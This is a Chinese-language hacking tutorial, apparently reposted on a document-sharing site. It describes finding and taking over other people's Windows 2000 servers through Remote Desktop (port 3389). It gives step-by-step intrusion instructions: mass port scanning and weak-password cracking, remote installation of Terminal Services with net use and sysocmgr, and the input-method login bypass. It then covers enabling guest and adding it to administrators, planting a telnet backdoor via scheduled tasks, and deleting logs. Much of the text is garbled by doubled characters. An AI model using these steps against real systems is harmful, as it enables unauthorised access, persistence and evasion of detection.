终端服务相关知识17784.docx

《终端服务相关知识17784.docx》由会员分享，可在线阅读，更多相关《终端服务相关知识17784.docx（11页珍藏版）》请在淘文阁 - 分享文档赚钱的网站上搜索。

1、从终端服服务33889讲起昨天天我们讲讲到了提提升权限限的问题题，好现现在我们们就来说说一个简简单的入入侵，从从33889找个肉肉鸡（没没有肉鸡鸡的话，对对自己的的技术提提高是没没好处的的，不能能老是看看却不练练啊，陈陈同学你你说对吗吗？）请请各位注注意，我我这里并并不是说说什么烂烂鬼输入入法漏洞洞。这种种漏洞差差不多已已经绝迹迹了，太太难找了了，如果果有人找找到了，那那恭喜你你啦。众众所周知知，有开开33889的一般般都是服服务器，也也就是说说有很大大可能带带局域网网的，而而内部入入侵比外部要方方便一点点，这对对大家是是很好的的，我想想看我这这个东西西的很多多都是学学生吧(声明我我就个学学生

2、哦）。如如何能快快速方便便的得到到开了终终端的肉肉机呢？这需要要用到两两个工具具，都是是扫描工工具来的的，scaanneer3.0和焦点点的xsccan。打开scaanneer，输入入一段IP，范围围要大一一点，scaanneer速度很很快的。在“所有端口从”那里都填3389，点击“开始”就可以开工了。很快的，扫描完成，结果出来了。点击右下脚的“删除”把多余的IP删了，只留下开了3389的IP。再点击“保存”，把结果保存到文件夹里。找到保存文件的目录，打开它。用记事本的替换功能把它保存为一个纯IP的TXT文件。“编辑替换”在“查找内容”里输入要删除的垃圾，再点“全部替换”就行了。打开xscan

3、，点击左边的蓝色按钮，进入“扫描板块”，只需在“SQL-Server弱口令”“NT-Server弱口令”前打钩，其他都清除掉。再点击右边的蓝色按钮，进入“扫描参数”，钩上“从文件获取主机列表”，打开刚才替换成纯IP的TXT文件，确定之后就可以扫描了。这时需要比较长的时间！（注意我是拿3.0为例的，其他的也差不多）。确定目标，用mstsc（登陆终端的工具，这个我不喜欢用，但确实很容易上手的）登陆对方主机后，打开对方cmd.exe，输入“net use”，先看看有没有人也在连接这部机（安全一点好，毕竟不是在学雷峰啊）。“net view”命令之后当出现一堆前面带字符的就表示就表示什么呢？我想大家都

4、非常明白吧!，如果不明白的话，我。（也不知道怎么说了）想做个补充发现很多多朋友对对什么叫叫终端服服务有点点模糊好好，我们们就详细细说说毕竟这这个概念念很重要要的终端端服务提提供了通通过作为为终端仿仿真器工工作的“瘦客户户机”软件远远程访问问服务器器桌面的的能力。终终端服务务只把该该程序的的用户界界面传给给客户机机。客户户机然后后返回键盘盘和鼠标标单击动动作，以以便由服服务器处处理。每每个用户户都只能能登录并并看到它它们自己己的会话话，这些些会话由由服务器器操作系系统透明明地进行行管理，而而且与任任何其他他客户机机会话无无关。客客户软件件可以运运行在多多个客户户机硬件件设备上上，包括括计算机机和

5、基于于 Wiindoows的的终端。其其他设备备，如 Maacinntossh计算算机或基基于 UNNIX的的工作站站，也可可以使用用其他第第三方的的软件连连接到终终端服务务器。终端服务务可以在在应用服服务器模模式或远远程管理理模式下下在服务务器上进进行配置置。作为为应用服服务器，终终端服务务提供了了一种有有效而可可*的方式式，通过过网络服服务器分分发基于于 Wiindoows的的程序。在应用用服务器器模式下下，终端端服务为为可能无无法正常常运行 Wiindoows的的计算机机显示 Wiindoows 20000的桌桌面以及及目前基基于 Wiindoows的的大多数数应用程程序。在在远程管管理

6、模式式下使用用时，终终端服务务提供了了远程访访问的能能力，使使您可以以从网络络上的任任何地方方虚拟地地管理您您的服务务器。终端服务务有以下下好处：更快地地显示 Wiindoows 20000的桌桌面。终终端服务务架设了了一座从从旧式桌桌面迁移移到 Wiindoows 20000 PProffesssionnal的的桥梁，为为非计算算机桌面面以及需需要进行行硬件升升级才能能在本地地完全运运行 Wiindoows 20000操作作系统的的计算机机提供了了一种虚虚拟的 Winndowws 220000桌面环环境。终终端服务务客户可可用于多多种不同同的桌面面平台，包包括 MSS-DOOS、基于 Wii

7、ndoows的的终端、Maccinttoshh和 UNNIX。（与 MSS-DOOS、Maccinttoshh和基于 UNNIX的的计算机机的连接接需要附附加的软软件）。充分利利用已有有的硬件件。终端端服务扩扩展了分分布式计计算模型型，允许许计算机机同时作作为瘦客客户机和和具有完完整功能能的个人人计算机机操作。当当计算机机在现有有的网络络上时，可可以继续续使用，同同时也可可作为能能仿真 Wiindoows 20000 PProffesssionnal桌桌面的瘦客户机机使用。程序的的集中配配置。使使用运行行在 Wiindoows 20000 SServver上上的终端端服务，所所有程序序的执行行

8、、数据据的处理理以及数数据的存存储都在在服务器器上进行行，程序序得以集集中配置置。终端端服务可可确保所所有客户户机都能能访问当当前版本本的程序序。软件件只能在在服务器器上安装装一次，而而不能安安装在您您单位的的每个桌桌面上，这这样可减减少单独独更新计计算机所所花费的的成本。远程管管理。终终端服务务提供了了对 Wiindoows 20000 SServver的的远程管管理，为为系统管管理员提提供了从从任何客客户机通通过广域域网或拨拨号连接接远程管管理其服服务器的的一种方方法。功能：易于使使用可管理性安全性易于使用用功能说明详细信信息，请请参阅：自动的本本地打印印机支持持 Wiindoows 20

9、000 SServver终终端服务务可以添添加并自自动重新新连接终终端服务务客户所所连接的的打印机机。提供对对本地打打印机的的客户访访问剪贴板板重定向向现在，用用户可以以在运行行于本地地计算机机和终端端服务器器上的程程序之间间剪切和和粘贴。共享的的剪贴板板性能增增强对缓存存功能的的增强，包包括持久久性缓存存、数据据包的利利用和数数据帧大大小，明明显地改改进了终终端服务务的性能能。位图缓缓存漫游式式断开连连接支持持此功能能使用户户不用注注销即可可从会话话中断开开连接。在在断开时时会话仍仍可保持持活动状态态，这使使得用户户可以从从另一台台计算机机中或在在稍后某某个时间间重新连连接到现现有会话话。重

10、新新连接需需要登录录，以便便在任何何时候都都能保证证每个会会话的安安全性。注销或或断开连连接多登录录支持用户可可以登录录到多个个会话，同同时从一一个或多多个客户户机到多多个 Wiindoows 20000 SServver，或者者多次登登录到一一个服务务器。这这样，用用户就可可以同时时执行多多项任务务或运行行多个单单独的桌桌面会话话。管理用用户和客客户机可管理性性功能说明详细信信息，请请参阅：会话远远程控制制支持者者可查看看或控制制另一终终端服务务会话。键键盘输入入、鼠标标移动以以及图形形显示可可在两个个终端服服务会话话之间共享享，为支支持者提提供了诊诊断和解解决配置置问题以以及远程程培训用用

11、户的能能力。此此功能对对于带有有分支机机构的单单位特别别有用。远程控控制网络负负载平衡衡网络负负载平衡衡使终端端服务客客户可连连接到运运行终端端服务的的服务器器组中最最轻闲的的成员。网络负负载平衡衡和终端端服务基于 Wiindoows的的终端根据 Wiindoows CE操操作系统统和远程程桌面协协议 (RRDP)的自定定义实现现，不同同的制造造商可提提供基于于 Wiindoows的的终端。客户连连接管理理器管理员员和用户户可以为为一个程程序或全全部桌面面访问建建立到服服务器的的预定义义连接。客客户连接接管理器器在客户户机桌面面上创建建图标，以便能通通过一次次单击连连接到一一个或多多个终端端服

12、务器器。想在在计算环环境中提提供单个个程序的的管理员员可以创创建连接接并将该该连接与与终端服服务客户户软件一一同分发发。管理终终端服务务用户连连接终端服服务授权权终端服服务授权权帮助系系统管理理员和采采购部门门跟踪客客户机及及其相关关许可证证。授权终终端服务务分布式式文件系系统 (DDFS)支持对分布布式文件件系统 (DDFS)的支持持使用户户可以连连接到 DFFS共享享位置，而而且使管管理员可可以从终终端服务务器主控控 DFFS共享享。分布式式文件系系统概述述终端服服务管理理器管理员员可以使使用终端端服务管管理器查查询和管管理 Wiindoows 20000 SServver上上的终端端服务

13、会会话、用用户和进进程。管理终终端服务务终端服服务配置置终端服服务连接接配置可可用于创创建、修修改和删删除 Wiindoows 20000 SServver上的的一个或或一组会会话并访访问服务务器设置置。配置终终端服务务与 Wiindoows 20000 SServver“本地用用户和组组”以及“Acttivee Diirecctorry用户户和计算算机”的集成管理员员可以按按照为 Wiindoows 20000 SServver用用户创建建帐户的的相同方方式为终终端服务务用户创创建帐户户。另有有一些字字段可用用来指定定终端服服务专用用信息，如如终端服服务配置置文件路路径和主主目录。终端服务用

14、户帐帐户与 Wiindoows 20000 SServver系系统监视视器的集集成与 Wiindoows 20000 SServver系系统监视视器的集集成使管管理员可可以监视视器终端端服务系系统性能能，包括括跟踪处处理器的的使用情情况、内内存分配配和分页页内存使使用情况况，并在在每个用用户的会会话之间间交换。性能监监视消息传传递支持持管理员员可以就就一些重重要的信信息警告告用户，如如系统关关机、升升级或新新程序。使用终终端服务务管理器器远程管管理具有管管理级特特权而且且可访问问终端服服务管理理级实用用程序的的任何用用户都可可以远程程管理运运行终端端服务的的服务器器的各方方面工作作。可配置置的

15、会话话超时设设置管理员可以以通过配配置会话话超时来来减少服服务器资资源的使使用。管管理员可可以指定定活动会会话的长长度以及及会话可可在服务务器上闲闲置多长长时间配置会会话限制制安全性功功能说明详细信息息，请参参阅：加密多级加加密使管管理员可可以根据据安全性性需要在在三种不不同级别别（低级级、中级级或高级级）上加加密在 Wiindoows 20000 SServver和和终端服服务客户户之间传传输的所所有或部部分数据据。另外外，终端端服务登登录过程程包括更更改密码码、桌面面解锁以以及屏幕幕保护功功能解锁锁。登录录过程是是加密的的，以确确保用户户名称和和密码的的安全传传输。终终端服务务支持在在服务

16、器器和客户户机之间间的 400位和 1228位加加密（1288位加密密只能在在美国和和加拿大大使用）。确定加加密的级级别限制登登录尝试试和连接接时间管理员员可以限限制用户户登录尝尝试次数数，以防防止有人人未授权权访问服服务器。另另外，个个别用户户或分组组用户的的连接时时间可以以进行限限制。配置终终端服务务终端服务务配置概概述终端服服务连接接提供了了客户机机可用于于登录到到服务器器上某个个会话的的链接。TCPP/IPP连接是是当终端端服务在在 Wiindoows 20000 SServver上上启用时时自动配配置的。使使用终端端服务配配置，您您可以更更改连接接的默认认属性或或添加新新连接。终端服

17、务务配置打开终终端服务务配置时时，您将将会看到到已经配配置的连连接。这这称为 RDDP-TTCP连连接。通通常，这这只是需需要为使使用终端端服务器器的客户户配置的的连接。对对于终端端服务器器，只能能为每个个网卡配配置一个个 RDDP（远程程桌面协协议）连连接。如如果要配配置其他他的 RDDP连接接，您必必须安装装附加的的网卡。使用终端端服务配配置，您您可以重重新配置置 RDDP-TTCP连连接的属属性，包包括限制制客户机机会话在在服务器器上保持持活动状状态的时时间、设设置加密密的保护护级别以以及选择择您希望望用户和和组具备备的权限限。某些些连接属属性也可可以使用用“本地用用户和组组”的终端端服

18、务扩扩展程序序在每用用户基础础上配置置。例如如，当您您使用“本地用用户和组组”的终端端服务扩扩展程序序时，可可以为每每个用户户设置不同会话话期限。使使用终端端服务配配置，您您可以只只在每连连接基础础上设置置会话期期限，这这意味着着相同期期限将应应用于使使用连接接登录到到服务器器的所有有用户。除配置连连接以外外，您可可以使用“终端服服务配置置”功能配配置可应应用于终终端服务务器的设设置。包包括临时时文件夹夹的设置置、默认认连接安安全性以以及启用用/禁用 Innterrnett连接器器许可。详详细信息息，请参参阅配置置服务器器设置。基于 CCitrrix CA的的客户机机终端服服务配置置还用于于为

19、基于于 Ciitriix CCA的客客户机配配置连接接。当 Ciitriix CCA协议议和基于于 Ciitriix CCA的客客户软件件添加到到该系统统时，可可以使用 TCCP/IIP、同步步、IPXX/SPPX或 NeetBIIOS传传输协议议配置这这些连接接有很多朋朋友问怎怎么开启启33889终端服服务下面面我们一一起来探探索一下下远程开开启33889的方法.首先我我们应该该了解33889终端服服务,可以运运行在什什么系统统下,个人了了解,终端服服务在M$的大部部分产品中中都可运运行,如:wiinntt4/wwin220000serrverr/wiin20000AADV-serrverr

20、/wiin20000DDS/XXP等. 但winnnt44中是需需要单独独购买的的,20000专业版版不能远远程安装装终端服服务的,至少我我没成功功过. 我们们在以下下的探索索中,是以winn20000serrverr和高级serrver为例的.(现在用用的也最最多). 现在开开始.假设我我们拿到到了一个个主机的的管理员员帐户和和密码. 主机: 1192.1688.0.1 帐帐号: aadmiinisstraatorr 密码: 777888 20000系统安安装在c:winnnt下从上面面的的介介绍可以以知道,20000专业版版是不可可以远程程安装终终端服务务的,那我们们就要首首先来判断此此主

21、机是是专业版版还是服服务器版版,才能进进入下一一个环节节.我们可可以先用用对方所所开帐户户判断: cc:lettmeiin 1992.1168.0.11 -aall -d staatinng cconnnecttingg too seerveer . Serrverr loocall tiime is: 20002-1-113 110:119:222 SStarrt gget alll usserss FOORM serrverr. - Tootall = 5 - nnum00= AAdmiinisstraatorr () nuum1= Guuestt () nuum2= IUUSR_serr

22、verrnamme (Intternnet来来宾帐号号 ) num3= IWAAM_sservvernnamee (启动 IIIS进程程帐号) nuum4= TssIntternnetUUserr (TTsInnterrnettUseer) - TTotaal = 5 -一一般情况况numm2/33/4这三个个帐户都都是20000seerveer默认开开启的. 20000专业版版默认是是不开这这些帐户户的.我们也也可以扫扫描对方方开放的的端口进进一步确确认: 用扫扫描软件件如:suuperrscaan3.exee扫描对对方所开开端口判断对对方是否否开启25,33772等20000seervee

23、r默认开开启的端端口.当然我我们还可可以使用用一些工工具,如:cmmdinnfo.zipp 这2个东东东可以获获得本地地或远程程NT/2K主机的的版本,系统路路径,源盘路路径,PAACK版本,安装时时间等一一系列信信息,一个图图形界面面,一个命命令行. 通过过返回的的信息就就可以很很清楚的的了解对对方主机机情况.还有一一些其他他的方法法来判断断,如:从对方方所开的的服务来来确定等等, 从上上面的判判断准确确率还算算高,别的就就不一一一说明了了. 如果果你在以以上步骤骤里发现现对方主主机并没没有那3个帐户,默认端端口也没没开, 或cmddinffo返回的的信息对对方是2000专业版,你就要要放弃

24、安安装3389的计划划了. 现在在我们要要进入下下一环节节: 判断断终端服服务到底底有没有有安装?你也许许要问:为什么么还要判判断啊?我扫描描没有发发现33889端口啊啊这里就就需要解解释一下下,如果装装了终端端服务组组件,可能有有哪几种种情况扫扫描不到到33889端口? 1.终端服服务terrmseerviice在管理工工具服务中被禁禁用. 2.终端服服务连接接所需的的RDP协议在管理工工具终端服服务配置置中被停停用连接接. 3.终端服服务默认认连接端端口33889被人为为的改变变.如何改改变请看看修改终终端服务务默认的的33889端口4.终端端服务绑绑定的网网络适配配器不是是外网的的.5.

25、防火墙墙和端口口过滤之之类的问问题. 6.(还有我我没想到到的) 其实,我们遇遇到最多多的情况况就是以以上5种情况.现在开开始判组组件是否否被安装装.先与远远程主机机连接,映射远远程主机机C盘为本本地Z盘nett usse zz: 1992.1168.0.11c$ 777888 /useer:admminiistrratoor 命令成成功完成成。然后转转到Z盘,检查Z:Doccumeentss annd SSetttinggsAAll Useers开始始菜单单程序管理工工具 里是是否有终端服服务管理理器和终端服服务配置置的快捷捷方式文文件如有已已安装服服务组件件的会有有,反之,没有(988%人

26、为为故意删删的可能能性较小小) 我们们还可以以在下一一步tellnett到对方方主机后后使用终终端服务务自带的的命令进进一步的的核实.判断完完毕,对方好好像是没没有安装装终端服服务组件件,可以进进入下一一步: teelneet登陆对对方主机机,准备安安装服务务组件.在这里,我强烈烈建议使使用20000自带的tellnett服务端端登陆, 有回回显,不容易易出错.个人感感觉使用用它,一次成成功的比比例高很很多.(呵呵,个人理理解啊!) 就算没没有开,打开用用完后再再关掉就就完了. .aabu.写的最最快速登登录WINN2K TELLNETT服务已经经把这个个方法介介绍的非非常详细细, 而且且他的

27、办办法(在本机机建立同同名,同密码码帐户),让快速速实现tellnett登陆成成为现实实.假如我我们已开开启对方方23端口, teelneet 1192.1688.0.1 输输入用户户名/密码*= 欢欢迎使用用 Miicroosofft TTelnnet服服务器。*= CC: 成功进进入!进入入后,再次检检查终端端组件是是否安装装: c:qquerry uuserr这个工工具需要要安装终终端服务务.这样就就进一步步确定了了组件没没有被安安装.如果返返回: USSERNNAMEE SEESSIIONNNAMEE IDD STTATEE IDDLE TIMME LLOGOON TTIMEE ww1

28、 cconssolee 0运运行中 . 20002-11-122 222:5 类似这这样的信信息,可能组组件就已已安装.好!都清楚楚了,可以开开始安装装了. - CC:dirr c:syysocc.innf /s /检查INF文件的的位置c:WINNNTinff的目录 20000-01-10 20:00 3,7770 syssoc.inff 1个文件 3,7700字节- C: ddir c:syssocmmgr.* /s /检查组组件安装装程序c:WINNNTsysstemm32的的目录20000-001-110 220:000 442,7768 syssocmmgr.exee 1个文件 42

29、2,7668字节- c:eccho Coompoonennts c:wawwa cc:echho TTSEnnablle = onn c:waawa /这是建建立无人人参与的的安装参参数c:tyype c:wawwa Commponnentts TSEEnabble = oon /检查参参数文件件- c:syysoccmgrr /ii:c:wiinnttinnfssysooc.iinf /u:c:wawwa /q - 这这一条就就是真正正安装组组件的命命令. 以上上这条命命令没有有加/R参数,主机在在安装完完后自动动重起. 如若若加了/R参数主主机就不不会重起起.如果一一切正常常的话,几分钟钟

30、后对方方主机将将会离线线,当它重重新回来来时, 3389终端服服务就已已经开启启.你就可可以连上上去了.问题和和建议: AA在安装装过程中中,不使用/R,有时主主机也不不会重起起,你就要要手动重重起他,但在使使用诸如如:iiisreesett /rrebooot命令时,对方的屏幕幕会出现现个对话话框,写着谁谁引起的的这次启启动,离重起起还有多多少秒. BB一次不不行可以以再试一一次,在实际际中很有有作用. CC在输入syssocmmgr命令开开始安装装时,一定不不要把命命令参数数输错,那会在在对方出出现一个个大的对对话框,是syssocmmgr的帮助,很是显显眼, 而且且要求确确定.在你的的屏

31、幕上上是不会会有任何何反应的的,你不会会知道出出错，所所以会有有B的建议. 好了以后后你就想想干什么么就干什什么了。不不过有时时候还真真不知道道干什么么，总之之得干个个事，装装个什么么局域网网控制软软件，不不过不要要体积太太大，容容易被发发现。超强C语语言代码码,你有信信心看懂懂吗?刚刚说说有输入入法漏洞洞的机子子很少了了，但有有些朋友友担心还还有怎么么办，不不是吃大大亏了吗吗？这样样我找了了一篇写写的不错错的文章章贴一下下(注意是是转载)写的不不错，据据说是新新写的，这这位大哥哥也真闲闲啊WIN220000中文简简体版存存在的输输入法漏漏洞，可可以使本本地用户户绕过身身分验证证机制进进入系统

32、统内部。经经实验，WINN20000中文简简体版的的终端服服务，在在远程操操作时仍仍然存在在这一漏漏洞，而而且危害更大大。WINN20000的终端端服务功功能，能能使系统统管理员员对WINN20000进行远远程操作作，采用用的是图图形界面面，能使使用户在在远程控控制计算算机时功功能与在在本地使使用一样样，其默默认端口口为33889，用户户只要装装了WINN20000的客户户端连接接管理器器就能与与开启了了该服务务的计算算机相联联。因此此这一漏漏洞使终终端服务务成为WINN20000的合法法木马。工具：客户端端连接管管理器，下下载地址址：自己己找吧，天天天有好好几种呢呢。入侵步步骤：一，获获得管

33、理理员账号号。我们先先对一个个网段进进行扫描描，扫描描端口设设为33889，运行行客户端端连接管管理器，将将扫描到到的任一一地址加加入到，设设置好客客户端连连接管理理器，然然后与服服务器连连结。几几秒钟后后，屏幕幕上显示示出WINN20000登录界界面（如如果发现现是英文文或繁体体中文版版，放弃弃，另换换一个地地址），用CTRL+SHIFT快速切换输入法，切换至全拼，这时在登录界面左下角将出现输入法状态条（如果没有出现，请耐心等待，因为对方的数据流传输还有一个过程）。用右键点击状态条上的微软徽标，弹出“帮助”（如果发现“帮助”呈灰色，放弃，因为对方很可能发现并已经补上了这个漏洞），打开“帮助”

34、一栏中“操作指南”，在最上面的任务栏点击右键，会弹出一个菜单，打开“跳至URL”。此时将出现WIN2000的系统安装路径和要求我们填入的路径的空白栏。比如，该系统安装在盘上，就在空白栏中填入c:winntsystem32。然后按“确定”，于是我们就成功地绕过了身份验证，进入了系统的SYSTEM32目录。现在我们要获得一个账号，成为系统的合法用户。在该目录下找到net.exe，为net.exe创建一个快捷方式，右键点击该快捷方式，在“属性”“目标”c:winntsystem32net.exe后面空一格，填入user guest /active :yes点“确定”。这一步骤目的在于用net.exe

35、激活被禁止使用的guest账户，当然也可以利用user用户名密码add，创建一个新账号，但容易引起网管怀疑。运行该快捷方式，此时你不会看到运行状态，但guest用户已被激活。然后又修改该快捷方式，填入user guest密码，运行，于是guest便有了密码。最后，再次修改，填入“localgroup administrators guest /add，将guest变成系统管理员。注意事项：、在这过程中，如果对方管理员正在使用终端服务管理器，他将看到你所打开的进程id，你的ip和机器名，甚至能够给你发送消息。、终端服务器在验证你的身份的时候只留给了你一分钟的时间，在这一分钟内如果你不能完成上述操

36、作，你只能再连结。、你所看到的图像与操作会有所延迟，这受网速的影响。二，创建建跳板。再次登登录终端端用务器器，以guuestt身份进进入，此此时gueest已是系系统管理理员，已已具备一一切可执执行权。打打开“控制面面板”，进入“网络和和拔号连连接”，在“本地连连接”或“拔号连连接”中查看看属性，看看对方是是否选择择“Miccrossoftt网络的的文件和和打印机机共享”，如果果没有，就就打上勾勾。对方方如果使使用的是拔号号上网，下下次拔号号网络共共享才会会打开。退出对对方系统统，在本本地机命命令提示示符下，输输入nett usse IPP AdddreessIPCC$ paasswwordd

37、 /usser:guusett，通过IPC的远程程登陆就就成功了了。登陆成成功之后后先复制制一个Tellnett的程序序上去（小小榕流光光安装目目录下的的Toools目录里里的Srvv.exxe,另外，还还有ntmml.xxex，一会会要用），这这个程序序是在对对方上面面开一个个Tellnett服务，端端口是99。coppy cc:hhackksrrv.eexe *.*.*.*admmin$ 然后利利用定时时服务启启动它，先了解对方的时间：net time *.*.*.* 显示：*.*.*.*的当前时间是 2001/1/8下午 08:55 命令成功完成。然后启动srv.exe: at *.*.

38、*.* 09:00 srv.exe显示：新加了一项作业，其作业 ID = 0 过几分钟后，telnet *.*.*.* 99 这里不需要验证身份，直接登录，显示：c:winnt:system32 我们就成功登陆上去了。然后又在本地打开命令提示符，另开一个窗口，输入：copy c:hackntlm.exe 211.21.193.202admin$ 把事先存放在hack目录里的ntlm.exe拷过去。然后又回到刚才的telnet窗口，运行ntlm.exe C:WINNTsystem32ntlm 显示：Windows 2000 Telnet Dump, by Assassin, All Rights Reserved. Done! C:WINNTsystem32 C:WINNTsystem32 好，现在我们来启动WIN2000本身的telnet，首先终止srv.exe的telnet服务：net stop telnet系统告诉你并没有启动telnet，不理它，继续：net start telnet这次真的启动了telnet，我们可以在另开的命令提示符窗口telnet到对方的23端口，验证身份，输入我们的guest账号和密码，它就真正成为我们的跳板了。我们可以利用它到其它的主机去。三、扫除脚印：删除为net.exe创建的快捷方式，删除winntsystem32logfiles下边的日志文件